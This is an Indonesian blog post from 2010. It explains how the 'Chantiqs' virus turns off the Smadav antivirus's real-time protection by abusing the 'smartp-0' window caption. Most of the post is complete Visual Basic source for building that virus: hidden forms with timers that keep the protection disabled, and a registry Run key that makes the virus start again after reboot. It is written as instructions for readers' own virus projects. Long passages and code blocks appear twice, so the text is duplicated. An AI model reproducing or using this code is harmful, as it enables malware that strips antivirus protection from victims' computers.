Kamis, 22 April 2010
Ini dia yang di tunggu-tunggu oleh semua orang, rahasia bagaimana cara virus chantiqs mematikan antivirus Smadav Anda. Virus ini menggunakan cara sederhana yang tidak banyak di ketahui oleh semua orang.
-kita buat satu folder smartp-0 di explorer.
-kemudian pastikan rtp smadav aktif.
-lalu buka folder tersebut.
-Dalam sekejap rtp smadav mati.
Coba cari di google dengan kata kunci "smartp-0" atau langsung ke kaskus karena trik ini didapat dari sana, tapi Anda harus jadi kaskuser terlebih dahulu.
Langsung saja baca :
Sebenarnya ini adalah trik mudah. Kalau kamu sudah paham trik "smartp-0" kamu sebenarnya tinggal menerapkannya pada virusmu.
Dulu saya sempat berjalan-jalan ke forum kaskus, ternyata mereka sudah membahas trik ini. Di sana disebutkan bahwa jika ada folder "smartp-0" dibuka maka RTP smadav akan mati.
Ringkasnya begini:Langsung saja baca :
Sebenarnya ini adalah trik mudah. Kalau kamu sudah paham trik "smartp-0" kamu sebenarnya tinggal menerapkannya pada virusmu.
Dulu saya sempat berjalan-jalan ke forum kaskus, ternyata mereka sudah membahas trik ini. Di sana disebutkan bahwa jika ada folder "smartp-0" dibuka maka RTP smadav akan mati.
-kita buat satu folder smartp-0 di explorer.
-kemudian pastikan rtp smadav aktif.
-lalu buka folder tersebut.
-Dalam sekejap rtp smadav mati.
Sebagian orang menyebutkan bahwa ini adalah trik exploitasi folder smartp-0.
Saya tidak setuju. Ini bukan exploitasi folder smartp-0 tetapi exploitasi Caption smartp-0. RTP smadav bekerja dengan melihat caption smartp-0 untuk mengatur dirinya.
Ini butuh mekanisme feedback yang dijalankan oleh timer tentunya. Begitu timer menemukan string caption “smartp-0” maka timer yang ada di RTP berhenti bekerja. Interval timer yang digunakan kira-kira 100 sampai 1000. Dan paling tepat sekitar 500. Ini masih dugaan.
Proses ini bisa dikerjakan cukup dengan satu timer saja. Sedangkan timer yang lain mengawasi explorer untuk menscan tiap folder yang baru dibuka. (itu pun kalau timer pemantau string "smartp" dengan timer pengawas virus dibedakan).
Pemicu lainnya adalah tombol "Activate". Tombol ini diduga berperan untuk mengaktifkan timer
pemantau tadi sekaligus mengubah string caption sensitif tadi ("smartp-0") menjadi string yang lain.
Supaya timer pemantau tidak langsung disfungsi. Bisa dipastikan tombol “Activate” mengubah string caption sensitif tadi sebelum mengaktifkan timer pemantau dan proses ini membutuhkan waktu yang sangat cepat sebelum timer pemantau menghabiskan interval pertamanya.
Ini semua masih dugaan.
Kembali ke masalah caption "smartp-0".
Timer pemantau membaca semua caption aplikasi yang aktif baik itu caption tersembunyi maupun caption yang terlihat. Ini membuktikan kalau teori exploitasi folder smartp-0 runtuh dan yang benar adalah exploitasi caption smartp-0.
Entah kenapa, tak satupun virus maker Indonesia yang terpikirkan hal ini. Dengan memanfaatkan caption "smartp-0" di dalam project virusnya, RTP smadav akan mati.
Berikut cara membuat virusnya :
Ingat, virus ini dibuat dengan menggunakan visualbasic.
Buat 6 form
Beri semua form dengan caption "smartp-0" (mulai dari form 1 - form 6).
Setiap form-nya tambahkan satu timer. Timer inilah yang akan bersaing dengan timer pemantau RTP smadav sekaligus kecepatan tangan user mengklik tombol “Activate”. Saya sadar kalau satu timer tidak cukup jadi saya butuh 6 timer untuk melawan RTP ini. Itu alasannya kenapa harus ada 6 form.
Interval setiap timer yang ada di keenam form tadi berbeda-beda.
Timer di form1 dan form2 nilainya 100
Timer di form3 dan form4 nilainya 250
Timer di form5 dan form6 nilainya 450
Hal ini harus dilakukan, supaya virus Chantiqs mampu mempertahankan kemenangannya secara konstan atas RTP smadav. Selain itu, dengan nilai interval yang berbeda ini RTP tidak mampu menemukan celah kosong di antara interval timer yang aktif setiap kelipatan intervalnya. Dengan kata lain, trik ini membuat seolah-olah RTP smadav disable secara permanent.
Nah, berikut adalah source code yang harus diketik setiap formnya.
Untuk form1
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form2
Timer1.Enabled = False
Unload Me
End Sub
Untuk form2
Private Sub Form_Load()
Me.Visible = False
Timer1.Enabled = True
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form1
Timer1.Enabled = False
Unload Me
End Sub
Untuk form3
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form4
Timer1.Enabled = False
Unload Me
End Sub
Untuk form4
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form3
Timer1.Enabled = False
Unload Me
End Sub
Untuk form5
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form6
Timer1.Enabled = False
Unload Me
End Sub
Untuk form6
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form5
Timer1.Enabled = False
Unload Me
End Sub
Lalu tambahkan satu module di project virusmu.
Ketik code berikut:
'by The DarkVirii => In Padang
'18 April 2010
Sub main()
Dim b As Object
Set b = CreateObject("wscript.shell")
b.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\chantiqs",App.Path & "\" & App.EXEName & ".com"
MsgBox "Smadav, you are dead, man! " & vbCrLf & "Fix your software!" & vbCrLf
& "And Get Lost!" & vbCrLf & vbCrLf & "By: Chantiqs", vbCritical, "Chantiqs' Virus"
Load Form1
Load Form3
Load Form5
End Sub
Aturlah agar startup object-nya adalah "Sub Main"
Maka selesailah virus Chantiqs mu.
Thanks to : Morphic & MeinSoftLab
Saya tidak setuju. Ini bukan exploitasi folder smartp-0 tetapi exploitasi Caption smartp-0. RTP smadav bekerja dengan melihat caption smartp-0 untuk mengatur dirinya.
Ini butuh mekanisme feedback yang dijalankan oleh timer tentunya. Begitu timer menemukan string caption “smartp-0” maka timer yang ada di RTP berhenti bekerja. Interval timer yang digunakan kira-kira 100 sampai 1000. Dan paling tepat sekitar 500. Ini masih dugaan.
Proses ini bisa dikerjakan cukup dengan satu timer saja. Sedangkan timer yang lain mengawasi explorer untuk menscan tiap folder yang baru dibuka. (itu pun kalau timer pemantau string "smartp" dengan timer pengawas virus dibedakan).
Pemicu lainnya adalah tombol "Activate". Tombol ini diduga berperan untuk mengaktifkan timer
pemantau tadi sekaligus mengubah string caption sensitif tadi ("smartp-0") menjadi string yang lain.
Supaya timer pemantau tidak langsung disfungsi. Bisa dipastikan tombol “Activate” mengubah string caption sensitif tadi sebelum mengaktifkan timer pemantau dan proses ini membutuhkan waktu yang sangat cepat sebelum timer pemantau menghabiskan interval pertamanya.
Ini semua masih dugaan.
Kembali ke masalah caption "smartp-0".
Timer pemantau membaca semua caption aplikasi yang aktif baik itu caption tersembunyi maupun caption yang terlihat. Ini membuktikan kalau teori exploitasi folder smartp-0 runtuh dan yang benar adalah exploitasi caption smartp-0.
Entah kenapa, tak satupun virus maker Indonesia yang terpikirkan hal ini. Dengan memanfaatkan caption "smartp-0" di dalam project virusnya, RTP smadav akan mati.
Berikut cara membuat virusnya :
Ingat, virus ini dibuat dengan menggunakan visualbasic.
Buat 6 form
Beri semua form dengan caption "smartp-0" (mulai dari form 1 - form 6).
Setiap form-nya tambahkan satu timer. Timer inilah yang akan bersaing dengan timer pemantau RTP smadav sekaligus kecepatan tangan user mengklik tombol “Activate”. Saya sadar kalau satu timer tidak cukup jadi saya butuh 6 timer untuk melawan RTP ini. Itu alasannya kenapa harus ada 6 form.
Interval setiap timer yang ada di keenam form tadi berbeda-beda.
Timer di form1 dan form2 nilainya 100
Timer di form3 dan form4 nilainya 250
Timer di form5 dan form6 nilainya 450
Hal ini harus dilakukan, supaya virus Chantiqs mampu mempertahankan kemenangannya secara konstan atas RTP smadav. Selain itu, dengan nilai interval yang berbeda ini RTP tidak mampu menemukan celah kosong di antara interval timer yang aktif setiap kelipatan intervalnya. Dengan kata lain, trik ini membuat seolah-olah RTP smadav disable secara permanent.
Nah, berikut adalah source code yang harus diketik setiap formnya.
Untuk form1
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form2
Timer1.Enabled = False
Unload Me
End Sub
Untuk form2
Private Sub Form_Load()
Me.Visible = False
Timer1.Enabled = True
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form1
Timer1.Enabled = False
Unload Me
End Sub
Untuk form3
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form4
Timer1.Enabled = False
Unload Me
End Sub
Untuk form4
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form3
Timer1.Enabled = False
Unload Me
End Sub
Untuk form5
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form6
Timer1.Enabled = False
Unload Me
End Sub
Untuk form6
Private Sub Form_Load()
Timer1.Enabled = True
Me.Visible = False
App.TaskVisible = False
End Sub
Private Sub Timer1_Timer()
Load Form5
Timer1.Enabled = False
Unload Me
End Sub
Lalu tambahkan satu module di project virusmu.
Ketik code berikut:
'by The DarkVirii => In Padang
'18 April 2010
Sub main()
Dim b As Object
Set b = CreateObject("wscript.shell")
b.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\chantiqs",App.Path & "\" & App.EXEName & ".com"
MsgBox "Smadav, you are dead, man! " & vbCrLf & "Fix your software!" & vbCrLf
& "And Get Lost!" & vbCrLf & vbCrLf & "By: Chantiqs", vbCritical, "Chantiqs' Virus"
Load Form1
Load Form3
Load Form5
End Sub
Aturlah agar startup object-nya adalah "Sub Main"
Maka selesailah virus Chantiqs mu.Thanks to : Morphic & MeinSoftLab
Sumber : http://www.meinsoftlab.co.cc/2010/04/rahasia-virus-chantiqs-terungkap.html
Tidak ada komentar:
Posting Komentar